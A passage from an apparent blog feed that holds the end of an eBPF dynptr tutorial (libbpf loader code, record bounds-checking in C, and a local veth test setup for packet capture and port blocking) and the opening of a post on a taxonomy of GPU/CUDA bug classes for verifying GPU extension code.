    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_tc_opts&lt;/span&gt; &lt;span class="n"&gt;opts&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sz&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;handle&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;priority&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                                &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;prog_fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dynptr_tc_ingress&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;

    &lt;span class="n"&gt;bpf_tc_hook_create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* process exit status; set to 1 if the attach fails */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_tc_attach&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"TC attach failed&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ring_buffer&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;enable_ringbuf&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt;
        &lt;span class="n"&gt;ring_buffer__new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_map__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;maps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;handle_event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Attached to %s. blocked_port=%u snap_len=%u&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ifname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;exiting&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;ring_buffer__poll&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="n"&gt;usleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;ring_buffer__free&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_tc_detach&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_tc_hook_destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;dynptr_tc_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the User-Space Code
&lt;/h3&gt;

&lt;p&gt;The userspace program loads the BPF skeleton, configures it through the array map, and attaches to TC ingress. The ring buffer callback &lt;code&gt;handle_event()&lt;/code&gt; receives each variable-length event and prints it.&lt;/p&gt;

&lt;p&gt;Notice how we access the variable-length payload. The &lt;code&gt;struct event_hdr&lt;/code&gt; ends with a flexible array member &lt;code&gt;payload[]&lt;/code&gt;. When an event arrives, &lt;code&gt;data_sz&lt;/code&gt; gives the total record size and &lt;code&gt;e-&amp;gt;snap_len&lt;/code&gt; gives the number of payload bytes the BPF side included. Before touching the payload bytes, we check that &lt;code&gt;snap_len&lt;/code&gt; is nonzero and that &lt;code&gt;data_sz&lt;/code&gt; is large enough to hold the header plus &lt;code&gt;snap_len&lt;/code&gt; bytes.&lt;/p&gt;
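
&lt;p&gt;As a minimal sketch of this kind of validation, the standalone program below parses a variable-length record in plain C, without libbpf. The &lt;code&gt;struct demo_hdr&lt;/code&gt; layout and the &lt;code&gt;parse_record()&lt;/code&gt; helper are hypothetical stand-ins for illustration (the real &lt;code&gt;struct event_hdr&lt;/code&gt; is defined in &lt;code&gt;dynptr_tc.h&lt;/code&gt;). The sketch is slightly stricter than the callback above: it confirms the buffer holds a complete header before reading &lt;code&gt;snap_len&lt;/code&gt; at all.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;#include &amp;lt;stddef.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;

/* Hypothetical record layout: fixed header followed by snap_len payload bytes. */
struct demo_hdr {
    uint32_t pkt_len;
    uint32_t snap_len;
    unsigned char payload[];   /* flexible array member */
};

/* Returns the number of payload bytes that are safe to read, or -1 if the
 * record is too short for the header or for the payload it claims. */
static long parse_record(const void *data, size_t data_sz)
{
    const struct demo_hdr *h = data;

    if (data_sz &amp;lt; sizeof(*h))
        return -1;                      /* cannot even read snap_len */
    if (h-&amp;gt;snap_len &amp;gt; data_sz - sizeof(*h))
        return -1;                      /* header claims more than was delivered */
    return (long)h-&amp;gt;snap_len;
}

int main(void)
{
    const char msg[] = "GET /";
    size_t total = sizeof(struct demo_hdr) + strlen(msg);
    struct demo_hdr *rec = malloc(total);

    if (!rec)
        return 1;
    rec-&amp;gt;pkt_len = 74;
    rec-&amp;gt;snap_len = (uint32_t)strlen(msg);
    memcpy(rec-&amp;gt;payload, msg, strlen(msg));

    printf("full record: %ld\n", parse_record(rec, total));
    printf("truncated record: %ld\n", parse_record(rec, total - 1));
    printf("short header: %ld\n", parse_record(rec, 4));
    free(rec);
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Writing the second check as a subtraction (&lt;code&gt;data_sz - sizeof(*h)&lt;/code&gt;) rather than an addition avoids any overflow concern, because the first check has already established that &lt;code&gt;data_sz&lt;/code&gt; is at least the header size.&lt;/p&gt;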

&lt;p&gt;The configuration map allows runtime control over blocking behavior and snapshot length without reloading the BPF program. This demonstrates the common pattern of using maps for user-to-kernel communication.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Navigate to the dynptr directory and build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/dynptr
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This compiles the BPF program with the repository's standard toolchain, generating the skeleton header and linking against libbpf.&lt;/p&gt;

&lt;h3&gt;
  
  
  Creating a Test Environment
&lt;/h3&gt;

&lt;p&gt;To test properly, we need a network namespace so traffic actually traverses the veth pair rather than going through loopback. The included &lt;code&gt;test.sh&lt;/code&gt; script handles this automatically, but here's the manual setup:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create network namespace&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip netns add test_ns

&lt;span class="c"&gt;# Create veth pair with one end in the namespace&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip &lt;span class="nb"&gt;link &lt;/span&gt;add veth_host &lt;span class="nb"&gt;type &lt;/span&gt;veth peer name veth_ns
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip &lt;span class="nb"&gt;link set &lt;/span&gt;veth_ns netns test_ns

&lt;span class="c"&gt;# Configure host side&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip addr add 10.200.0.1/24 dev veth_host
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip &lt;span class="nb"&gt;link set &lt;/span&gt;veth_host up

&lt;span class="c"&gt;# Configure namespace side&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip netns &lt;span class="nb"&gt;exec &lt;/span&gt;test_ns ip addr add 10.200.0.2/24 dev veth_ns
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip netns &lt;span class="nb"&gt;exec &lt;/span&gt;test_ns ip &lt;span class="nb"&gt;link set &lt;/span&gt;veth_ns up

&lt;span class="c"&gt;# Start HTTP server inside the namespace&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;ip netns &lt;span class="nb"&gt;exec &lt;/span&gt;test_ns python3 &lt;span class="nt"&gt;-m&lt;/span&gt; http.server 8080 &lt;span class="nt"&gt;--bind&lt;/span&gt; 10.200.0.2 &amp;amp;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Running the Demo
&lt;/h3&gt;

&lt;p&gt;Start the dynptr TC program attached to the host side of the veth:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./dynptr_tc &lt;span class="nt"&gt;-i&lt;/span&gt; veth_host &lt;span class="nt"&gt;-p&lt;/span&gt; 0 &lt;span class="nt"&gt;-s&lt;/span&gt; 32
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In another terminal, make a request:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl http://10.200.0.2:8080/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see output showing captured packets:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Attached to TC ingress of veth_host (ifindex=X). Ctrl-C to exit.
blocked_port=0 snap_len=32 ringbuf=1
if=X 10.200.0.2:8080 -&amp;gt; 10.200.0.1:XXXXX len=221 drop=0 snap=32 payload="HTTP/1.0 200 OK..Server: SimpleH"
if=X 10.200.0.2:8080 -&amp;gt; 10.200.0.1:XXXXX len=742 drop=0 snap=32 payload="&amp;lt;!DOCTYPE HTML&amp;gt;.&amp;lt;html lang="en"&amp;gt;"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output shows HTTP response packets from the server, with the payload field containing the beginning of the response data.&lt;/p&gt;

&lt;h3&gt;
  
  
  Testing the Drop Policy
&lt;/h3&gt;

&lt;p&gt;Test blocking by specifying port 8080:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./dynptr_tc &lt;span class="nt"&gt;-i&lt;/span&gt; veth_host &lt;span class="nt"&gt;-p&lt;/span&gt; 8080 &lt;span class="nt"&gt;-s&lt;/span&gt; 32
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In another terminal:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;--max-time&lt;/span&gt; 3 http://10.200.0.2:8080/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The curl request should time out because the server's response packets are dropped on ingress at &lt;code&gt;veth_host&lt;/code&gt;. The dynptr_tc output shows &lt;code&gt;drop=1&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;if=X 10.200.0.2:8080 -&amp;gt; 10.200.0.1:XXXXX len=74 drop=1 snap=0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Using the Test Script
&lt;/h3&gt;

&lt;p&gt;For convenience, run the included test script, which handles all of the setup automatically:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./test.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates the namespace, runs both capture and blocking tests, and cleans up afterward.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use Dynptrs
&lt;/h2&gt;

&lt;p&gt;Dynptrs shine in several scenarios. &lt;strong&gt;Variable-length events&lt;/strong&gt; are the classic use case since ringbuf dynptrs let you allocate exactly the size you need at runtime, avoiding wasted space from oversized fixed structures or complex multi-record schemes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Packet parsing&lt;/strong&gt; benefits from dynptrs when dealing with non-linear skbs or complex protocol stacks where traditional bounds checking becomes unwieldy. The slice API provides a cleaner abstraction that handles both linear and paged data uniformly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Crypto and verification&lt;/strong&gt; operations like &lt;code&gt;bpf_crypto_encrypt()&lt;/code&gt;, &lt;code&gt;bpf_verify_pkcs7_signature()&lt;/code&gt;, and &lt;code&gt;bpf_get_file_xattr()&lt;/code&gt; all use dynptrs as buffer arguments, making dynptr familiarity essential for these advanced use cases.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;User ringbuf consumption&lt;/strong&gt; through &lt;code&gt;bpf_user_ringbuf_drain()&lt;/code&gt; delivers samples as dynptrs, enabling safe handling of userspace-provided data in BPF programs.&lt;/p&gt;

&lt;p&gt;For simple fixed-size operations where you know bounds at compile time, traditional approaches may be simpler. But as your BPF programs grow more sophisticated, dynptrs become increasingly valuable.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;BPF dynptrs provide a verifier-friendly mechanism for working with variable-length and runtime-bounded data. Rather than proving memory safety entirely through static analysis, dynptrs shift some verification to runtime checks, enabling patterns that would otherwise be impossible or extremely awkward to express.&lt;/p&gt;

&lt;p&gt;Our example demonstrated the two primary dynptr patterns: using skb dynptrs with slices for clean packet parsing, and using ringbuf dynptrs for variable-length event output. The key takeaways are to always NULL-check slice returns, always submit or discard ringbuf dynptrs, and remember that skb dynptrs require kfuncs available from Linux v6.4.&lt;/p&gt;

&lt;p&gt;As eBPF capabilities continue to expand, dynptrs form an increasingly important part of the toolkit. Whether you're building packet processors, security monitors, or performance tools, understanding dynptrs will help you write cleaner, more capable BPF programs.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dynptr Concept Documentation:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/concepts/dynptrs/" rel="noopener noreferrer"&gt;https://docs.ebpf.io/linux/concepts/dynptrs/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;bpf_ringbuf_reserve_dynptr Helper:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/helper-function/bpf_ringbuf_reserve_dynptr/" rel="noopener noreferrer"&gt;https://docs.ebpf.io/linux/helper-function/bpf_ringbuf_reserve_dynptr/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;bpf_dynptr_from_skb Kfunc:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_from_skb/" rel="noopener noreferrer"&gt;https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_from_skb/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;bpf_dynptr_slice Kfunc:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_slice/" rel="noopener noreferrer"&gt;https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_slice/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kernel Kfuncs Documentation:&lt;/strong&gt; &lt;a href="https://docs.kernel.org/bpf/kfuncs.html" rel="noopener noreferrer"&gt;https://docs.kernel.org/bpf/kfuncs.html&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tutorial Repository:&lt;/strong&gt; &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This example requires Linux kernel 6.4 or newer for the skb dynptr kfuncs. The ringbuf dynptr helpers are available from Linux 5.19. Complete source code is available in the tutorial repository.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>verifier</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>A Taxonomy of GPU Bugs: 19 Defect Classes for CUDA Verification</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 10 Feb 2026 07:53:16 +0000</pubDate>
      <link>https://forem.com/yunwei37/a-taxonomy-of-gpu-bugs-19-defect-classes-for-cuda-verification-169f</link>
      <guid>https://forem.com/yunwei37/a-taxonomy-of-gpu-bugs-19-defect-classes-for-cuda-verification-169f</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;GPU programming introduces a distinct class of correctness and performance challenges that differ fundamentally from traditional CPU-based systems. The SIMT (Single Instruction, Multiple Threads) execution model, hierarchical memory architecture, and massive parallelism create unique bug patterns that require specialized verification and detection techniques.&lt;/p&gt;

&lt;p&gt;Just as eBPF enables safe, verified extension code to run inside the Linux kernel, &lt;a href="https://github.com/eunomia-bpf/bpftime" rel="noopener noreferrer"&gt;bpftime gpu_ext&lt;/a&gt; (see the &lt;a href="https://arxiv.org/abs/2512.12615" rel="noopener noreferrer"&gt;arXiv paper&lt;/a&gt;; previously named &lt;a href="https://dl.acm.org/doi/10.1145/3723851.3726984" rel="noopener noreferrer"&gt;eGPU&lt;/a&gt;) brings eBPF to GPUs, allowing user-defined policy code (for observability, scheduling, or resource control) to be injected into GPU drivers and kernels with &lt;strong&gt;static verification guarantees&lt;/strong&gt;. Such a GPU extension framework must ensure that policy code cannot introduce crashes, hangs, data races, or unbounded overhead. A critical concern in modern GPU deployments is &lt;strong&gt;performance interference in multi-tenant environments&lt;/strong&gt;: contention for shared resources makes execution time unpredictable. "Making Powerful Enemies on NVIDIA GPUs" studies how adversarial kernels can amplify slowdowns, arguing that performance interference is a &lt;em&gt;system-level safety&lt;/em&gt; property when GPUs are shared. This motivates treating bounded overhead as a correctness property, not merely an optimization goal.&lt;/p&gt;

&lt;p&gt;To build a sound GPU extension verifier, we must first understand what can go wrong. This taxonomy identifies the defect classes a verifier must address, drawing lessons from eBPF's success: restrict the programming model, enforce bounded execution, and verify memory safety before loading. We synthesize findings from static verifiers (GPUVerify, GKLEE, ESBMC-GPU), dynamic detectors (Compute Sanitizer, Simulee, CuSan), and empirical bug studies (Wu et al., ScoRD, iGUARD) into 19 defect classes organized along two primary dimensions, impact type (Safety, Correctness, Performance) and GPU specificity (GPU-specific, GPU-amplified, CPU-shared), and further annotated with verification scope and assurance type. Each entry provides concrete examples, documents detection tools, and offers actionable verification strategies.&lt;/p&gt;




&lt;h2&gt;
  
  
  Taxonomy Overview
&lt;/h2&gt;

&lt;p&gt;Each bug class is categorized along four dimensions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Impact Type:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Safety&lt;/strong&gt;: Program fails to complete safely (crash, hang, isolation failure, deadlock)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Correctness&lt;/strong&gt;: Program completes but produces wrong results&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Performance&lt;/strong&gt;: Program works correctly but inefficiently&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;GPU Specificity:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GPU-specific&lt;/strong&gt;: Unique to GPU/SIMT execution model&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPU-amplified&lt;/strong&gt;: Exists on CPUs but much more severe on GPUs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CPU-shared&lt;/strong&gt;: Similar on both platforms&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Verification Scope (for GPU extension frameworks):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;E (Extension-local)&lt;/strong&gt;: Can be verified by examining only the extension/policy code, without inspecting the host kernel. This is the ideal case: like eBPF, the verifier can provide strong safety guarantees for &lt;em&gt;any&lt;/em&gt; kernel the extension attaches to.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;C (Combined)&lt;/strong&gt;: Requires joint analysis of extension + kernel, or a contract between them. These bugs arise from interactions between policy code and kernel state/behavior.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;H (Host+Device/System)&lt;/strong&gt;: Involves host-side API ordering, driver state, or cross-boundary interactions that cannot be verified by device-side analysis alone.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Assurance Type (Soundness/Completeness guarantees):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;By-construction&lt;/strong&gt;: Bug class is structurally impossible due to language/feature restrictions. &lt;em&gt;Soundness&lt;/em&gt;: perfect (the bug cannot exist). &lt;em&gt;Completeness&lt;/em&gt;: high for policy use cases (restrictions rarely limit legitimate policies).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Static-sound&lt;/strong&gt;: If verifier accepts, property holds; but some safe programs rejected. &lt;em&gt;Soundness&lt;/em&gt;: strong. &lt;em&gt;Completeness&lt;/em&gt;: low (conservative).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Contract-based&lt;/strong&gt;: Requires declared preconditions validated at attach/launch time. &lt;em&gt;Soundness&lt;/em&gt;: conditional on contract correctness. &lt;em&gt;Completeness&lt;/em&gt;: depends on contract expressiveness.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bounded-sound&lt;/strong&gt;: Sound within specified bounds (loop unrolling, context switches). &lt;em&gt;Soundness&lt;/em&gt;: within bounds. &lt;em&gt;Completeness&lt;/em&gt;: limited by bound coverage.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic-only&lt;/strong&gt;: Detected at runtime; no static guarantee. &lt;em&gt;Soundness&lt;/em&gt;: for executed paths only. &lt;em&gt;Completeness&lt;/em&gt;: coverage-dependent.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime-enforced&lt;/strong&gt;: Property enforced via instrumentation/interception. &lt;em&gt;Soundness&lt;/em&gt;: if enforcement is complete. &lt;em&gt;Completeness&lt;/em&gt;: N/A (enforcement, not verification).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why These Dimensions Matter for GPU Extension Verifiers
&lt;/h3&gt;

&lt;p&gt;A GPU extension framework (like &lt;a href="https://arxiv.org/abs/2512.12615" rel="noopener noreferrer"&gt;bpftime gpu_ext&lt;/a&gt;) aims to provide &lt;strong&gt;static verification guarantees&lt;/strong&gt; analogous to eBPF: policy code should be safe to attach to &lt;em&gt;any&lt;/em&gt; kernel without risking crashes, hangs, or unbounded overhead. The key insight is:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Extension-local verification is the only path to strong, universal guarantees.&lt;/strong&gt; If a bug class can be eliminated by restricting the policy language or enforcing invariants on policy code alone, the verifier can guarantee safety without inspecting (potentially closed-source) kernels.&lt;/p&gt;
